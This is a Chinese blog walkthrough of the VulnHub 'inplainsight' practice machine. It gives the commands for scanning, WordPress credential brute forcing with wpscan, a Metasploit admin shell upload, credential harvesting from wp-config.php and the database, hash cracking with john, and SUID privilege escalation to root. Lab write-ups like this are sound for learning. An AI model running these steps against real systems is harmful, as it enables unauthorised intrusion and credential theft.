vulnhub之inplainsight的实践
2024-1-1 14:12:52 Author: 云计算和网络安全技术实践(查看原文) 阅读量:7 收藏

今天实践的是vulnhub的inplainsight镜像,

下载地址,https://download.vulnhub.com/inplainsight/inplainsight1.ova,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.176,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.176,

获取到靶机有80端口的http服务,

浏览器访问http://192.168.0.176,提示了index.htnl页面,

浏览器访问http://192.168.0.176/index.htnl,

点击图片,

点击Upload Image,

查看页面源码,

对编码进行明文转换,

echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d,

获取到so-dev-wordpress路径,

对路径进行扫描,dirb http://192.168.0.176/so-dev-wordpress,

确认是wordpress,

扫描用户,wpscan --url http://192.168.0.176/so-dev-wordpress --enumerate u,

获取到mike和admin,

进行密码暴破,wpscan --url http://192.168.0.176/so-dev-wordpress -U mike,admin -P /usr/share/wordlists/dirb/common.txt,

获取到用户名密码admin/admin1,

继续浏览器访问http://192.168.0.176/so-dev-wordpress,

提示了要通过域名进行访问,inplainsight,

修改hosts文件,192.168.0.176       inplainsight,

重新登录,确认邮件是对的,登录成功,

上metasploit,

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.0.176
set TARGETURI /so-dev-wordpress
set USERNAME admin
set PASSWORD admin1
exploit

获取到metasploit shell,getuid确认不是root,

转成普通shell,再转成交互式shell,

python3 -c 'import pty;pty.spawn("/bin/sh")',

查看当前用户下的home路径,确认有joe和mike两个账户,

在上两层目录中查看到有wp-config.php,

内容中发现有数据库的用户名密码,

sodevwp/sodevwp/oZ2R3c2x7dLL6#hJ,

转成bash,访问数据库,mysql -u sodevwp -p,

use sodevwp;
show tables;
select * from sodevwp_users;

查看到admin和mike账户的密码hash,

保存到hash文件,用john进行暴破,

john hash -wordlist=/usr/share/wordlists/rockyou.txt,

获取到mike/skuxdelux,

切换到mike,su mike,

查看/etc/passwd文件,cat /etc/passwd,没获取到有用信息,

继续查看/etc/passwd-,获取到joe/SmashMouthNoThanks,

再继续切到joe,id确认不是root,

查找root权限的程序,find / -perm -u=s -type f 2>/dev/null,

获取到bwrap,执行bwrap,获取到新的shell,id确认是root,


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650748155&idx=1&sn=621f6ce88e6333844d5caf64eb87b2bb&chksm=861b6ca6729513582a951f9df9853e752a98cc1904cb4ca38e25c0b576f20357607029472520&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh